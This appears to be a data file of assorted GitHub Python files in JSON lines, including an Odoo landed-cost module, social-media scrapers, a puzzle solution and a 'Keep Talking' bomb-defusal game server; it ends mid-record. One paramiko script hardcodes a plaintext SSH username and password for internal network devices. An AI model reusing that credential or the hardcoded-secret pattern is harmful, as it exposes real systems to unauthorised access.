+{"seq_id":"74771123639","text":"with open('nouv.txt', 'r') as fnouv:\n    lignes_nouv = list(fnouv.readlines())\n\nwith open('nouv_corr.txt', 'r') as cnouv:\n    lignes_corr = list(cnouv.readlines())\n\nwith open('correction.txt', 'w') as f:\n    for ln, lc in zip(lignes_nouv, lignes_corr):\n        n = ln.split(',')[1].strip()\n        c = lc.split(',')[1].strip()\n        f.write('{},{}\\n'.format(n, c))\n    ","repo_name":"lemairecarl/fautquonseparle","sub_path":"py/correction.py","file_name":"correction.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"31052543093","text":"from typing import Any, List\nfrom PIL import Image\nfrom torch import tensor,stack\nfrom transformations.transformation import Transformation\nfrom torchvision.transforms import ToTensor, ToPILImage\n\n\nclass Pipeline:\n    def __init__(self, transformation_list: List[Transformation], patch_size_list: List[int], crop:bool=True):\n        self.transformation_list=transformation_list\n        self.patch_size_list=patch_size_list\n        self.incremental_list=[]\n        self.crop=crop\n\n    def __call__(self, img: Image.Image) -> List[Image.Image]:\n        transformed_img_list=[]\n        for p in self.patch_size_list:\n            padded_img=self.pad_img(img=img, patch_size=p)\n            transformed_img=self.patch_and_transform(img=padded_img, patch_size=p)\n            if self.crop:\n                transformed_img=transformed_img.crop((0,0,self.width,self.height))\n            transformed_img_list.append(transformed_img)\n\n        return transformed_img_list\n\n    def pad_img(self, img: Image.Image, patch_size: int) -> List[Image.Image]:\n        width, height = img.size\n        self.width=width\n        self.height=height\n\n        # Calculate the amount of padding needed\n        pad_width = (width // patch_size + 1) * patch_size - width\n        pad_height = (height // patch_size + 1) * patch_size - height\n\n        # Create a new blank image with the desired dimensions\n        padded_img = Image.new(img.mode, (width + pad_width, height + pad_height), color='white')\n\n        # Paste the original image onto the padded image\n        padded_img.paste(img, (0, 0))\n\n        return padded_img\n\n    def patch_and_transform(self, img: Image.Image, patch_size: int) -> List[Image.Image]:\n        patches = []\n        width, height = img.size\n\n        for y in range(0, height - patch_size + 1, patch_size):\n            for 
x in range(0, width - patch_size + 1, patch_size):\n patch = img.crop((x, y, x + patch_size, y + patch_size))\n patches.append(patch)\n\n patches_tensor=stack([ToTensor()(p) for p in patches])\n for transformation in self.transformation_list:\n patches_tensor=transformation(patches_tensor, patch_size=patch_size)\n\n new_patches = [ToPILImage()(patches_tensor[i]) for i in range(patches_tensor.size(0))]\n\n recombined_img = img.copy()\n\n new_incremental=[img.copy()]\n\n patch_index = 0\n for y in range(0, height - patch_size + 1, patch_size):\n for x in range(0, width - patch_size + 1, patch_size):\n transformed_patch = new_patches[patch_index]\n recombined_img.paste(transformed_patch, (x, y))\n if self.crop:\n new_incremental.append(recombined_img.copy().crop((0,0,self.width,self.height)))\n else:\n new_incremental.append(recombined_img.copy())\n patch_index += 1\n self.incremental_list.append(new_incremental)\n return recombined_img\n \n def get_incremental_list(self):\n return self.incremental_list","repo_name":"jamesBaker361/hobai","sub_path":"pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":3051,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"42176715361","text":"# -*- coding: utf-8 -*-\nfrom collections import defaultdict\nfrom odoo import api, fields, models, tools, _\nfrom odoo.exceptions import ValidationError, UserError\nfrom odoo.tools.float_utils import float_is_zero\n\nclass LandedCost(models.Model):\n _inherit = 'stock.landed.cost'\n\n analytic_tag_id = fields.Many2one(\n 'account.analytic.tag', string=\"Analytic tag\",\n help=\"Analytic tag associated with the invoice. E.g. DIN1\")\n\n @api.depends('cost_lines.price_unit')\n def _compute_total_amount(self):\n for cost in self:\n prec_digits = self.env.company.currency_id.decimal_places\n cost.amount_total = sum(round(line.price_unit,prec_digits) for line in cost.cost_lines)\n\n def compute_landed_cost(self):\n AdjustementLines = self.env['stock.valuation.adjustment.lines']\n AdjustementLines.search([('cost_id', 'in', self.ids)]).unlink()\n\n digits = self.env['decimal.precision'].precision_get('Product Price')\n towrite_dict = {}\n for cost in self.filtered(lambda cost: cost._get_targeted_move_ids()):\n total_qty = 0.0\n total_cost = 0.0\n total_weight = 0.0\n total_volume = 0.0\n total_line = 0.0\n all_val_line_values = cost.get_valuation_lines()\n for val_line_values in all_val_line_values:\n for cost_line in cost.cost_lines:\n val_line_values.update({'cost_id': cost.id, 'cost_line_id': cost_line.id})\n self.env['stock.valuation.adjustment.lines'].create(val_line_values)\n total_qty += val_line_values.get('quantity', 0.0)\n total_weight += val_line_values.get('weight', 0.0)\n total_volume += val_line_values.get('volume', 0.0)\n\n former_cost = val_line_values.get('former_cost', 0.0)\n # round this because former_cost on the valuation lines is also rounded\n total_cost += tools.float_round(former_cost, precision_digits=0) if digits else former_cost\n\n total_line += 1\n\n for line in cost.cost_lines:\n value_split = 0.0\n for valuation in cost.valuation_adjustment_lines:\n value = 0.0\n if valuation.cost_line_id and valuation.cost_line_id.id == line.id:\n if line.split_method == 'by_quantity' and total_qty:\n per_unit = (round(line.price_unit) / total_qty)\n value = valuation.quantity * per_unit\n elif line.split_method == 'by_weight' and total_weight:\n per_unit = (round(line.price_unit) / total_weight)\n value = valuation.weight * 
per_unit\n elif line.split_method == 'by_volume' and total_volume:\n per_unit = (round(line.price_unit) / total_volume)\n value = valuation.volume * per_unit\n elif line.split_method == 'equal':\n value = (round(line.price_unit) / total_line)\n elif line.split_method == 'by_current_cost_price' and total_cost:\n per_unit = (round(line.price_unit) / total_cost)\n value = valuation.former_cost * per_unit\n else:\n value = (round(line.price_unit) / total_line)\n\n if digits:\n value = tools.float_round(value, precision_digits=0, rounding_method='UP')\n fnc = min if line.price_unit > 0 else max\n value = fnc(value, line.price_unit - value_split)\n value_split += value\n\n if valuation.id not in towrite_dict:\n towrite_dict[valuation.id] = value\n else:\n towrite_dict[valuation.id] += value\n for key, value in towrite_dict.items():\n AdjustementLines.browse(key).write({'additional_landed_cost': (value)})\n return True\n\n def _check_sum(self):\n \"\"\" Check if each cost line its valuation lines sum to the correct amount\n and if the overall total amount is correct also \"\"\"\n prec_digits = self.env.company.currency_id.decimal_places\n for landed_cost in self:\n total_amount = sum(landed_cost.valuation_adjustment_lines.mapped('additional_landed_cost'))\n if not tools.float_is_zero(total_amount - landed_cost.amount_total, precision_digits=prec_digits):\n return False\n\n val_to_cost_lines = defaultdict(lambda: 0.0)\n for val_line in landed_cost.valuation_adjustment_lines:\n val_to_cost_lines[val_line.cost_line_id] += val_line.additional_landed_cost\n if any(not tools.float_is_zero(round(cost_line.price_unit,) - val_amount, precision_digits=prec_digits)\n for cost_line, val_amount in val_to_cost_lines.items()):\n return False\n return True\n\n def search_tags(self):\n \n if self.cost_lines:\n raise ValidationError(_(\"The cost lines were already generated.\"))\n\n invoices = self.env['account.move'].search([]).filtered(\n lambda r: self.analytic_tag_id in r.analytic_tag_ids)\n\n if not invoices:\n raise ValidationError(_(\n \"There are no results for this analytic tag.\"))\n\n cost_lines = {}\n for invoice_line in invoices.mapped('invoice_line_ids'):\n if invoice_line.product_id.landed_cost_ok:\n cost_lines.update({\n invoice_line.product_id: cost_lines.get(\n invoice_line.product_id, 0.0) + invoice_line.price_unit,\n })\n\n if not cost_lines:\n raise ValidationError(_(\n \"No landed cost product was found for this analytic tag.\"))\n\n self.write({\n 'cost_lines': [(0, 0, {\n 'product_id': product.id,\n 'name': product.name or '',\n 'split_method': product.split_method_landed_cost or 'equal',\n 'price_unit': price,\n 'account_id': product.property_account_expense_id.id or product.categ_id.property_account_expense_categ_id.id,\n }) for product, price in cost_lines.items()],\n })\n\n\n def get_valuation_lines(self):\n \"\"\"Overwrites the original method to include average in the validation\n of the cost methods.\"\"\"\n lines = []\n\n for move in self.mapped('picking_ids').mapped('move_lines'):\n if move.product_id.valuation != 'real_time' or move.product_id.cost_method not in ['fifo', 'average']:\n continue\n vals = {\n 'product_id': move.product_id.id,\n 'move_id': move.id,\n 'quantity': move.product_qty,\n 'former_cost': move.product_id.standard_price,\n 'weight': move.product_id.weight * move.product_qty,\n 'volume': move.product_id.volume * move.product_qty\n }\n lines.append(vals)\n\n if not lines and self.mapped('picking_ids'):\n raise UserError(_(\n 'The selected picking does not contain 
any move that would be '\n                'impacted by landed costs. Landed costs are only possible for '\n                'products configured in real time valuation with real price '\n                'costing method. Please make sure it is the case, or you '\n                'selected the correct picking'))\n        return lines\n\n\nclass AdjustmentLines(models.Model):\n    _inherit = 'stock.valuation.adjustment.lines'\n\n    new_cost = fields.Float(\n        compute='_compute_new_cost',\n        help=\"Former Cost (Per unit) + Additional Landed Cost / Quantity\")\n\n    def _compute_new_cost(self):\n        \"\"\"Computes the new cost amount\"\"\"\n        for record in self:\n            record.new_cost = (\n                record.final_cost + record.additional_landed_cost\n                / record.quantity)\n","repo_name":"thiemed3/Thiemed","sub_path":"as_thimed_invoice/models/stock_landed_cost.py","file_name":"stock_landed_cost.py","file_ext":"py","file_size_in_byte":8215,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"}
+{"seq_id":"13920003187","text":"prices = [13.21, 78.01, 43, 98.06, 39.92, 27.67, 87, 7, 51, 61.32]\nprices_2 = []\n\nprint(id(prices))\n\nfor price in prices:\n    big_price = int(price)\n    small_price = price % big_price\n    small_price = int(small_price * 100)\n    prices_2.append(f'{big_price:02d} руб. {small_price:02d} коп.')\n\nall_price = ', '.join(prices_2)\nprint(all_price)\n\nprices.sort()\nprint(id(prices), prices)\n\nprices_rev_sort = sorted(prices, reverse=True)\nprint(prices_rev_sort)\n\nprices.sort(reverse=True)\nprint(prices[:5])\n","repo_name":"pakEA/pythons_homeworks","sub_path":"task_2_5.py","file_name":"task_2_5.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"22167354738","text":"n, m, a, c, x0 = map(int, input().split())\r\narr = []\r\nfor _ in range(n):\r\n    x0 = (a*x0 + c)%m\r\n    arr.append(x0)\r\n# binary search over arr, which is deliberately left unsorted here; the\r\n# program counts how many of the generated values a plain binary search\r\n# still manages to find\r\ndef bs(x):\r\n    lo, hi = 0, len(arr)-1\r\n    while lo <= hi:\r\n        mid = (lo + hi)//2\r\n        if arr[mid] == x: return True\r\n        elif arr[mid] < x: lo = mid+1\r\n        else: hi = mid-1\r\n    return False\r\nprint(sum(map(bs, arr)))","repo_name":"RussellDash332/kattis","sub_path":"src/Out of Sorts/outofsorts.py","file_name":"outofsorts.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"40"}
+{"seq_id":"38550191797","text":"#!/usr/bin/env python\r\n#-*- coding:utf-8 -*-\r\n# read the text\r\ntxt=open('data.txt','r').read()\r\ntxt=txt.lower()\r\nfor ch in \"~@#$%^&*()_-+=<>?/,.:;{}[]|\\'\"\"\":\r\n    txt=txt.replace(ch,'')\r\nwords=txt.split()\r\n\r\n\r\n#count the words\r\ncounts={}\r\nsumcount=0\r\nfor word in words:\r\n    counts[word]=counts.get(word,0)+1\r\n    sumcount=sumcount + 1\r\n\r\n\r\nprint('There are '+str(sumcount)+' words.')\r\nprint('They are:')\r\nfor word in counts.keys():\r\n    print(word+': '+str(counts[word]))\r\n","repo_name":"wang6268/1zcp","sub_path":"114ly/114ly.py","file_name":"114ly.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"}
+{"seq_id":"23217264426","text":"import datetime\nimport time\nimport re\nfrom facepy import GraphAPI\nimport tweepy\nimport project_credentials\nfrom database_stuff import storeStatement, db\n\n\"\"\" Facebook stuff \"\"\"\nfb = GraphAPI(\n    project_credentials.fb_token\n)\n\ndef storeFbPostsFrom(posts, username, leaning):\n    \"\"\" Saves in DB Facebook posts from a given user, next to its political leaning \"\"\"\n    if leaning not in [\"left\", 
\"right\"]:\n raise Exception(\"Not a valid political leaning\")\n if not type(posts) is list:\n raise Exception(\"A lists of posts is required\")\n if not username:\n username = \"unidentified username\"\n\n for statement in posts:\n storeStatement(statement, leaning, username)\n\n\ndef getFbPostsFrom(username, since=(2015, 6, 1)):\n \"\"\" Creates a list if FB posts for a given user \"\"\"\n since_date = datetime.date(*since)\n since_unix_time = time.mktime(since_date.timetuple())\n\n result_pages = fb.get(\n \"{}/posts\".format(username),\n page = True,\n since = since_unix_time\n )\n print(result_pages.next())\n posts = []\n for page in result_pages:\n for post in page[\"data\"]:\n if \"message\" in post:\n statement = removeUrls(post[\"message\"])\n if isRelevantStatement(statement):\n print(statement.encode(\"utf-8\"))\n posts.append(statement)\n return posts\n\n\n\ndef searchFbPostsByHashtag(hashtag, leaning, since=(2015, 6, 1)):\n \"\"\" It appears searching posts is deprecated, we may have to give up on this one \"\"\"\n if leaning not in [\"left\", \"right\"]:\n raise Exception(\"Not a valid political leaning\")\n\n since_date = datetime.date(*since)\n since_unix_time = time.mktime(since_date.timetuple())\n\n result_pages = fb.search(\n hashtag,\n \"post\",\n page = True,\n since = since_unix_time\n )\n\n for page in result_pages:\n for post in page[\"data\"]:\n if \"message\" in post:\n statement = removeUrls(post[\"message\"])\n if isRelevantStatement(statement):\n print(statement.encode(\"utf-8\"))\n storeStatement(statement, leaning, \"Default_author\")\n\n\n\n\"\"\" Twitter stuff \"\"\"\nauth = tweepy.OAuthHandler(\n project_credentials.twitter_consumer_key,\n project_credentials.twitter_consumer_secret\n)\n\nauth.set_access_token(\n project_credentials.twitter_access_token,\n project_credentials.twitter_access_token_secret\n)\n\napi = tweepy.API(auth)\n\ndef getTweetsFromHashtag(hashtag, leaning, since=(2015, 6, 1)):\n \"\"\" Searches tweets by hashtag, and stores them in DB, next to its political leaning \"\"\"\n if leaning not in [\"left\", \"right\"]:\n raise Exception(\"Not a valid political leaning\")\n\n for tweet in limitHandled(tweepy.Cursor(api.search, q=hashtag).items()):\n if tweet.created_at < datetime.datetime(*since): break #If we reached the \"since\" date, just break\n if isRetweet(tweet): tweet.text = tweet.retweeted_status.text #If it's a retweet, access the original tweet\n tweet.text = removeUrls(tweet.text) #URLs shouldn't influence the classification decision\n #If the tweets are too short, or already in DB, disregard them\n if not isRelevantStatement(tweet.text) or isAlreadyInDb(tweet.text): continue\n print(tweet.created_at)\n print(tweet.text.encode(\"utf-8\"))\n #Otherwise, store the tweet in DB\n storeStatement(tweet.text, leaning, \"Default_author\")\n\n\ndef getTweetsFrom(username, leaning, since=(2015, 6,1)):\n \"\"\" Gets a given user's tweets, and stores them in DB, next to its political leaning \"\"\"\n if leaning not in [\"left\", \"right\"]:\n raise Exception(\"Not a valid political leaning\")\n\n for tweet in limitHandled(tweepy.Cursor(api.user_timeline, id=username).items()):\n if tweet.created_at < datetime.datetime(*since): break\n tweet.text = removeUrls(tweet.text)\n if not isRelevantStatement(tweet.text): continue\n print(tweet.created_at)\n print(tweet.text.encode(\"utf-8\"))\n storeStatement(tweet.text, leaning, username)\n\n\ndef limitHandled(cursor):\n \"\"\" Wraps a tweepy cursor with an iterator that handles rate limits 
\"\"\"\n while True:\n try:\n yield cursor.next()\n except tweepy.TweepError:\n print(\"Waiting for Twitter's time limit to expire...\")\n time.sleep(20 * 60)\n\n\n\n\n\"\"\" Useful extra stuff \"\"\"\n\ndef removeUrls(statement):\n \"\"\"Takes a string input, and removes the urls in it\"\"\"\n urls = re.findall(\"http[s]?://[^ ]+\", statement)\n if urls:\n for url in urls:\n statement = statement.replace(url, \"\")\n return statement\n\n\ndef isRelevantStatement(statement, min_len = 60):\n return len(statement) > min_len\n\ndef isRetweet(tweet):\n if hasattr(tweet, \"retweet_status\"):\n return True\n\ndef isAlreadyInDb(statement):\n c = db.execute(\"SELECT * FROM statements WHERE statement = ?\", (statement, ))\n if c.fetchone():\n return True\n","repo_name":"lalvarezguillen/political_leaning_classifier","sub_path":"tools/scrapers.py","file_name":"scrapers.py","file_ext":"py","file_size_in_byte":5020,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"29634412823","text":"import paramiko\nimport time\nimport threading\nimport multiprocessing\nonuMud = [\"\", \"\", \"\"]\nonu = [\"3\",\"4\",\"6\",\"7\",\"13\",\"21\"]\noutput =\"\"\noutput2 =\"\"\nout = \"\"\ndef pros1(resultado):\n global out\n global output\n client = paramiko.SSHClient()\n client.load_system_host_keys()\n client.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n client.connect('10.45.2.2', port=22, username='donavan', password='Ora@2020!')\n transport = client.get_transport()\n session = transport.open_session()\n # session.setblocking(0) # Set to non-blocking mode\n session.get_pty()\n session.invoke_shell()\n session.send('\\n')\n session.recv(8000)\n session.send(\"co t\")\n time.sleep(1)\n session.send('\\n')\n print(\"agora\")\n time.sleep(20)\n session.send(\"show gpon onu state gpon-olt_1/2/2\\n\")\n time.sleep(3)\n output = session.recv(100000)\n resultado += output.decode('utf-8')\n client.close()\ndef pros2(resultado):\n global out\n global output2\n client2 = paramiko.SSHClient()\n client2.load_system_host_keys()\n client2.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n client2.connect('10.45.2.14', port=22, username='donavan', password='Ora@2020!')\n transport2 = client2.get_transport()\n session2 = transport2.open_session()\n # session.setblocking(0) # Set to non-blocking mode\n session2.get_pty()\n session2.invoke_shell()\n session2.send('\\n')\n session2.recv(8000)\n session2.send(\"co t\")\n time.sleep(1)\n session2.send('\\n')\n print(\"agora\")\n time.sleep(20)\n session2.send(\"show gpon onu state gpon-olt_1/2/2\\n\")\n time.sleep(3)\n output2 = session2.recv(100000)\n resultado += output2.decode('utf-8')\n client2.close()\n\n\n'''t1 = threading.Thread(target=pros1)\nt2 = threading.Thread(target=pros2)\nt1.start()\nt2.start()'''\nif __name__ == '__main__':\n p1 = multiprocessing.Process(target=pros1)\n p2 = multiprocessing.Process(target=pros2)\n p1.start()\n p2.start()\n p1.join()\n p2.join()\n#zte 1: 1685, 95, 23","repo_name":"ParkUniverso/spuRev","sub_path":"teste.py","file_name":"teste.py","file_ext":"py","file_size_in_byte":2024,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"44697145765","text":"#TODO: happy ding on disarm\nimport time\nimport string\nimport random\nimport socket\nimport json\nimport pygame\n\nfrom select import select\n\npygame.init()\n\nleds_available = ['IBM', 'CAR', 'RAC', 'LIT', 'ARM']\nleds_on = {'IBM': 'A', 'CAR': 'B', 'RAC': 'C', 'LIT': 
'D', 'ARM': 'E'}\n\n#Bomb status codes\nINITIALISING = 0\nACTIVE = 1\nDEFUSED = 2\nEXPLODED = 3\n\n#Colour presets\nblack = (0, 0, 0)\nwhite = (255, 255, 255)\nblue = (0, 0, 127)\nbright_blue = (0, 0, 255)\nred = (127, 0, 0)\ngreen = (0, 127, 0)\ndim_green = (0,60,0)\nbright_green = (0, 255, 0)\nbright_red = (255, 0, 0)\n\n#Hard-coded LED image sizes. TODO rescale based on display res\nled_dimensions = (36,37)\n\ngreen_led = pygame.image.load('./images/green_led.png')\ngreen_led = pygame.transform.scale(green_led, led_dimensions)\nred_led = pygame.image.load('./images/red_led.png')\nred_led = pygame.transform.scale(red_led, led_dimensions)\nblue_led = pygame.image.load('./images/blue_led.png')\nblue_led = pygame.transform.scale(blue_led, led_dimensions)\norange_led = pygame.image.load('./images/orange_led.png')\norange_led = pygame.transform.scale(orange_led, led_dimensions)\npurple_led = pygame.image.load('./images/purple_led.png')\npurple_led = pygame.transform.scale(purple_led, led_dimensions)\n\nled_images = [orange_led, purple_led, blue_led]\noff_led = pygame.image.load('./images/off_led.png')\noff_led = pygame.transform.scale(off_led, led_dimensions)\n\nbackground = pygame.image.load('./images/diamond_plate_sm.jpg')\ninfo_screen = pygame.image.load('./images/timer_screen.png')\ninfo_screen = pygame.transform.scale(info_screen, (700, 55))\ntimer_screen = pygame.image.load('./images/timer_screen.png')\n\n\n#Uncomment/comment the below lines based on whether you want automatic dimensions (for fullscreen) or smaller (for windowed)\n\n#Auto dimensions\n#gameDisplay = pygame.display.set_mode()\n\n#Fixed dimensions\ngameDisplay = pygame.display.set_mode((1280, 800))\n\nbg_width, bg_height = background.get_rect().size\ndisplay_width = pygame.display.get_surface().get_width()\ndisplay_height = pygame.display.get_surface().get_height()\ntilex = display_width // bg_width + 1\ntiley = display_height // bg_height + 1\n\n#Uncomment to enable full screen\n#gameDisplay = pygame.display.set_mode((display_width, display_height), pygame.FULLSCREEN, 16)\n\nv_margin = 50\nh_margin = 80\n\nv_centre = display_height // 2\nh_centre = display_width // 2\n\nl_column = h_margin\nr_column = display_width - l_column\nt_row = v_margin\nb_row = display_height - t_row\n\nclock = pygame.time.Clock()\n\npygame.display.set_caption('KTaNE Bomb Server')\n\npygame.time.set_timer(pygame.USEREVENT, 1000)\n\ndef quitgame():\n pygame.quit()\n exit()\n\ndef text_objects(text, font, colour, background=None):\n textSurface = font.render(text, True, colour, background)\n return textSurface, textSurface.get_rect()\n\ndef button(msg, x, y, w, h, ic, ac, action=None):\n mouse = pygame.mouse.get_pos()\n click = pygame.mouse.get_pressed()\n if x + w > mouse[0] > x and y + h > mouse[1] > y:\n pygame.draw.rect(gameDisplay, ac, (x, y, w, h))\n if click[0] == 1 and action != None:\n action()\n else:\n pygame.draw.rect(gameDisplay, ic, (x, y, w, h))\n\n textSurf, textRect = text_objects(msg, smallText, white)\n textRect.center = ((x + (w / 2)), (y + (h / 2)))\n gameDisplay.blit(textSurf, textRect)\n\ndef format_time(timer):\n minutes = timer // 60\n seconds = timer % 60\n if seconds < 10:\n seconds = f\"0{seconds}\"\n return f\"{minutes}:{seconds}\"\n\ndef get_digits(toggle_compat=False):\n digits = '00'\n if toggle_compat:\n number = random.randint(5,31)\n if number > 10:\n digits = str(number)\n else:\n digits = '0' + str(number)\n else:\n digits = str(random.randint(0,99))\n return digits\n\n#Faux-randomly generates a serial number 
with these constraints:\n#CCNNCNNCNN (where C is a letter character and N is a digit)\n#At least one S and one R character\n#The first two digits following an S or R character shall be >=05 and <= 31\ndef generate_serial():\n letters = string.ascii_uppercase\n serial = ''\n die = random.randint(0,5)\n if die == 0:\n serial = 'S' + random.choice(letters)\n elif die == 1:\n serial = random.choice(letters) + 'S'\n elif die == 2:\n serial = random.choice(letters) + 'R'\n elif die == 3:\n serial = 'R' + random.choice(letters)\n else:\n serial = random.choice(letters) + random.choice(letters)\n serial += get_digits('S' in serial or 'R' in serial)\n if 'S' in serial:\n serial += random.choice(letters) + get_digits()\n else:\n serial += 'S' + get_digits(True)\n if 'R' in serial:\n serial += random.choice(letters) + get_digits()\n else: \n serial += 'R' + get_digits(True)\n return serial\n\n#Randomly selects 3 LEDs and uses a coin toss to turn them on or off\ndef generate_leds():\n leds = random.sample(range(0,4),3)\n led_code = ''\n for led in leds:\n if random.choice([True, False]):\n led_code += str(led)\n else:\n led_code += leds_on[leds_available[led]]\n return led_code\n\ndef decode_leds(code):\n #should ultimately return JSON?\n leds = {}\n for led in code:\n if led in '01234':\n leds[leds_available[int(led)]] = 'off'\n else:\n led = int(led, 16) - 10\n leds[leds_available[led]] = 'on'\n return leds\n\ndef new_bomb(timer):\n fuse_start = time.time() + 15\n fuse_end = fuse_start + timer*60\n serial = generate_serial()\n leds = generate_leds()\n status = INITIALISING\n strikes = 0\n max_strikes = 3\n modules = 0\n global module_leds\n module_leds = {}\n bomb = {'fuse_start':fuse_start, 'fuse_end':fuse_end, 'serial':serial, 'leds':leds, 'status':status, 'strikes':strikes, 'max_strikes':max_strikes, 'modules':modules}\n pygame.mixer.music.load('./sound/setup.ogg')\n pygame.mixer.music.play(0)\n return bomb\n\ndef add_strike(bomb):\n if bomb['status'] == ACTIVE:\n bomb['strikes'] += 1\n if bomb['strikes'] >= bomb['max_strikes']:\n bomb['status'] = EXPLODED\n pygame.mixer.Sound.play(explode)\n pygame.mixer.music.stop()\n else:\n pygame.mixer.Sound.play(strike)\n return bomb\n\ndef disarm_module(bomb):\n if bomb['status'] == ACTIVE:\n global disarmed_modules\n bomb['modules'] -= 1\n disarmed_modules += 1\n if bomb['modules'] <= 0 or (easy_mode and disarmed_modules >= 3):\n bomb['status'] = DEFUSED\n pygame.mixer.Sound.play(success)\n pygame.mixer.music.stop()\n else:\n pygame.mixer.Sound.play(chime)\n print(f\"Modules: {bomb['modules']}\")\n return bomb\n\ndef pick_led_colours(leds):\n led_colours = []\n for led in leds:\n led_colours.append(random.choice(led_images))\n return led_colours\nfuse = 5\neasy_mode = False\nbomb = new_bomb(fuse)\ndisarmed_modules = 0\nled_colours = pick_led_colours(bomb['leds'])\njson_bomb = json.dumps(bomb)\n\nCONNECTION_LIST = []\nRECV_BUFFER = 4096\nPORT = 9876\n\nSERVER_SOCKET = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nSERVER_SOCKET.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\nSERVER_SOCKET.bind((\"\", PORT)) #listens on all IPs\n\n#10 connections\nSERVER_SOCKET.listen(10)\n\nCONNECTION_LIST.append(SERVER_SOCKET)\nprint(\"Bomb server started.\")\n\ndef restart_bomb():\n global bomb \n global disarmed_modules\n disarmed_modules = 0\n bomb = new_bomb(fuse)\n\n#25 char display?\ndef info_display(message):\n screen_width, screen_height = info_screen.get_rect().size\n screen_x = h_centre - (screen_width // 2)\n screen_y = t_row\n 
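# A minimal property check (not from the repository above) for the serial constraints
# stated around generate_serial(): CCNNCNNCNN layout, at least one 'S' and one 'R',
# and the digit pair following an 'S' or 'R' constrained to 05..31. The helper name
# and the sample serials are illustrative assumptions.
import re

def is_valid_serial(serial):
    """Validate a KTaNE-style serial against the constraints described above."""
    if not re.fullmatch(r"[A-Z]{2}\d{2}[A-Z]\d{2}[A-Z]\d{2}", serial):
        return False  # wrong CCNNCNNCNN layout
    if "S" not in serial or "R" not in serial:
        return False  # must contain both an S and an R
    # letters sit at indices 0, 1, 4 and 7; map each to the digit pair that follows it
    digit_spans = {0: (2, 4), 1: (2, 4), 4: (5, 7), 7: (8, 10)}
    for i, (a, b) in digit_spans.items():
        if serial[i] in "SR" and not 5 <= int(serial[a:b]) <= 31:
            return False
    return True

assert is_valid_serial("SR07A23B11")
assert not is_valid_serial("AB99C12D34")  # no S or R anywhere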
gameDisplay.blit(info_screen, (screen_x, screen_y))\n chars = len(message)\n diff = 25 - chars\n message = message + (' ' * diff)\n TextSurf, TextRect = text_objects(message, info_text, bright_green)\n TextRect.left = screen_x + 20\n TextRect.top = screen_y + 5\n gameDisplay.blit(TextSurf, TextRect)\n\ndef place_serial(serial):\n serial = 'SN- ' + serial\n TextSurf, TextRect = text_objects(serial, serial_text, white, black)\n TextRect.left = l_column\n TextRect.top = t_row * 3\n gameDisplay.blit(TextSurf, TextRect)\n\ndef place_led(text, status, x, y, colour):\n TextSurf, TextRect = text_objects(text, serial_text, white, black)\n TextRect.left = x\n TextRect.top = y\n gameDisplay.blit(TextSurf, TextRect)\n if status == 'off':\n colour = off_led\n gameDisplay.blit(colour, (x - 40,y - 10)) \n\ndef place_modules(leds):\n TextSurf, TextRect = text_objects('Modules to disarm', serial_text, white, black)\n mod_width, mod_height = TextRect.size\n TextRect.left = r_column - mod_width\n TextRect.top = t_row * 3\n gameDisplay.blit(TextSurf, TextRect)\n x = TextRect.left + 60\n y = TextRect.top + mod_height + 20\n item = 0\n for led in leds:\n gameDisplay.blit(leds[led], (x, y))\n x = x + 100\n item += 1\n if item % 3 == 0:\n y += 50\n x = TextRect.left + 60\n for i in range(0,6-len(leds)):\n gameDisplay.blit(off_led, (x, y))\n x = x + 100\n item += 1\n if item % 3 == 0:\n y += 50\n x = TextRect.left + 60\n #TODO: blank box behind LEDs\n\ndef place_strikes(strikes):\n screen_width, screen_height = info_screen.get_rect().size\n x = h_centre - 110\n y = v_centre + screen_height + 100\n exes = ' ' + strikes * 'X '\n blanks = ' X X X '\n\n TextSurf, TextRect = text_objects('STRIKES', serial_text, white, black)\n TextRect.left = x + 35\n TextRect.top = y - 30\n gameDisplay.blit(TextSurf, TextRect)\n\n TextSurf, TextRect = text_objects(blanks, strike_text, black, black)\n TextRect.left = x\n TextRect.top = y\n gameDisplay.blit(TextSurf, TextRect)\n\n TextSurf, TextRect = text_objects(exes, strike_text, red, black)\n TextRect.left = x\n TextRect.top = y\n gameDisplay.blit(TextSurf, TextRect)\n\n\n#Hard coded max of 6 modules - expand? 
Add optional limits?\nmodule_leds = {}\n\n#Set up fonts\ninfo_text = pygame.font.Font('./fonts/led_dots.ttf', 50)\nserial_text = pygame.font.Font('./fonts/emboss.ttf', 30)\nstrike_text = pygame.font.Font('./fonts/inlanders.otf', 80)\nlargeText = pygame.font.Font('./fonts/digital-7.ttf', 115)\ntimer_backing = pygame.font.Font('./fonts/digital-7.ttf', 115)\nsmallText = pygame.font.Font('./fonts/inlanders.otf', 20)\n\n#Set up sounds\npygame.mixer.init()\nbeep = pygame.mixer.Sound(\"./sound/beep.ogg\")\nchime = pygame.mixer.Sound(\"./sound/chime.ogg\")\nstrike = pygame.mixer.Sound(\"./sound/error.ogg\")\nexplode = pygame.mixer.Sound(\"./sound/explode.ogg\")\nsuccess = pygame.mixer.Sound(\"./sound/success.ogg\")\n\n#Main game loop\nwhile True:\n for event in pygame.event.get():\n if event.type == pygame.USEREVENT:\n if bomb['status'] == INITIALISING:\n if time.time() > bomb['fuse_start']:\n if bomb['modules'] > 0:\n bomb['status'] = ACTIVE\n pygame.mixer.music.stop()\n pygame.mixer.music.load('./sound/strings.ogg')\n pygame.mixer.music.play(0)\n else:\n bomb['status'] = DEFUSED\n bomb = new_bomb(fuse)\n led_colours = 